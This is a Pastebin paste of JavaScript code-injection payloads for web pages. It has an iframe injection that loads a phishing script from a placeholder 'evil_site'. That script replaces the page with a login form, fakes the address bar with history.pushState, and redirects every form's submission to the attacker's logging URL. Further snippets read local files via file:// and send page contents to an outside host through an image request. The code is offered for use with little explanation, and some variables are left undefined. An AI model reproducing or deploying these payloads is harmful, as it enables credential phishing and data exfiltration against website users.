Guest User

Code injection Exploitation Examples !

a guest
May 17th, 2014
114
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @Abdelmoughite Eljoaydi
  2.  
  3. /**
  4. <iframe src="http://evil_site/phishing.js"></iframe>
  5. *This payload injects an iframe tag that will load the script located at "/phishing.js”.
  6. *Let’s take a look at what phishing.js could contain:
  7. */
  8.  
  9. // Function to override the HTML content.
  10. function override(url) {
  11. var xhr_req = new XMLHttpRequest();
  12. xhr_req.open('GET', url, false);
  13. xhr_req.onreadystatechange = function () {
  14. if (xhr_req.readyState == 4 && xhr_req.responseText != "") {
  15. document.innerHTML = xhr_req.responseText;
  16. }
  17. }
  18. xhr_req.send(null);
  19. }
  20.  
  21. //Call override(url) function to override the current page with the content of "LoginForm.jsp".
  22. override("/console/login/LoginForm.jsp"); // we can extend this exploitation to CSRF attacks.
  23.  
  24. //Spoofing current URI (URL bar will look like /console/login/LoginForm.jsp).
  25. var stateObj = { log: "login" };
  26. history.pushState(stateObj, document.getElementsByTagName("title")[0].innerHTML, "/console/login/LoginForm.jsp");
  27.  
  28. //Hooking forms and submit victim credentials to "http://evil_site/log".
  29. var forms = document.getElementsByTagName("form");
  30. for (index = 0; index < forms.length; index++) {
  31. void(forms[index].action = "http://evil_site/log");
  32. }
  33. ==============================================================================================================================
  34. //Reading local files. (works only on Firefox)
  35.  
  36. function _LFileAccess(_method,action,argv){
  37.  
  38.     req.open(_method,action,false);
  39.     if(_method=="POST")
  40.     req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  41.     req.send(argv);
  42.     return req.responseText;
  43.     }
  44.     var local_file=_LFileAccess("GET","file://localhost/C:/PATH/",null);
  45.     dump(local_file);
  46.  
  47. //Screen-capture of the current page state.
  48.     XMlHttpReq.open("GET","example.com",false);
  49.     function getURL(s) {
  50.     var image = new Image();
  51.     image.style.width = 0;
  52.     image.style.height = 0;
  53.     image.src = s;
  54.     }
  55.     getURL("http://example.com/page.php?pagecopie="+xmlHttpReq.responseText);
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×